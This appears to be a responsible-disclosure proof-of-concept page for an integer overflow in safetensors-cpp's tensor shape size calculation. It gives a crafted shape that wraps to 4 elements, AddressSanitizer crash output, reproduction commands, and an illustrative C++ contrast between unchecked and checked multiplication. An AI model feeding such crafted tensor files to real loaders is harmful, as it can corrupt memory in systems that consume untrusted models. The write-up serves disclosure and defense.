metadata
tags:
- safetensors
- security-research
SafeTensors C++ Integer Overflow PoC
Security Research - Responsible Disclosure via huntr
Vulnerability
safetensors-cpp get_shape_size() multiplies shape dimensions without overflow checking.
The Rust reference implementation uses checked_mul and rejects overflow.
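The shape [4194305, 4194305, 211106198978564] has a true element count far above 2^64, so the uint64 product wraps around to 4.
The parser then allocates 16 bytes, while a consumer that trusts the shape iterates over 4194305+ elements, resulting in a heap buffer overflow.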
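The wrap-around described above and a checked alternative, as an added example (not code from safetensors-cpp or from this write-up): the unchecked product returns 4 for the shape on this page, while a checked product rejects it in the same way Rust's checked_mul does. The function names, the tensor_fits helper and the 4-byte element size are assumptions made for the illustration.

```cpp
#include <cstdint>
#include <cstdio>
#include <limits>
#include <vector>

// Illustrative re-creation of an unchecked product (not the library's source):
// every multiplication silently wraps modulo 2^64.
std::uint64_t unchecked_shape_size(const std::vector<std::uint64_t>& shape) {
    std::uint64_t total = 1;
    for (std::uint64_t dim : shape) total *= dim;
    return total;
}

// Checked product: returns false instead of wrapping, the same outcome as
// Rust's checked_mul returning None.
bool checked_shape_size(const std::vector<std::uint64_t>& shape, std::uint64_t* out) {
    const std::uint64_t max = std::numeric_limits<std::uint64_t>::max();
    std::uint64_t total = 1;
    for (std::uint64_t dim : shape) {
        if (dim != 0 && total > max / dim) return false;  // would exceed 2^64 - 1
        total *= dim;
    }
    *out = total;
    return true;
}

// Hypothetical loader-side check: the element count times the element size
// must not overflow and must equal the number of data bytes actually present.
bool tensor_fits(const std::vector<std::uint64_t>& shape, std::uint64_t elem_size,
                 std::uint64_t data_len) {
    std::uint64_t count = 0;
    if (!checked_shape_size(shape, &count)) return false;
    if (elem_size != 0 && count > std::numeric_limits<std::uint64_t>::max() / elem_size)
        return false;
    return count * elem_size == data_len;
}

int main() {
    // Shape taken from this page; the 4-byte element size is an assumption.
    const std::vector<std::uint64_t> shape = {4194305ULL, 4194305ULL, 211106198978564ULL};
    std::uint64_t count = 0;
    std::printf("unchecked product: %llu\n",
                static_cast<unsigned long long>(unchecked_shape_size(shape)));
    std::printf("checked product accepted: %d\n", checked_shape_size(shape, &count));
    std::printf("fits a 16-byte buffer: %d\n", tensor_fits(shape, 4, 16));
    return 0;
}
```

A consumer should size its loops from the validated byte length, not from the raw shape values.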
ASan Result
AddressSanitizer: heap-buffer-overflow WRITE of size 4
0x6020000001a0 is located 0 bytes after 16-byte region
Reproduction
python3 craft_overflow.py
g++ -std=c++17 -DSAFETENSORS_CPP_IMPLEMENTATION -fsanitize=address -I safetensors-cpp -o crash crash_overflow.cc
./crash overflow_tensor.safetensors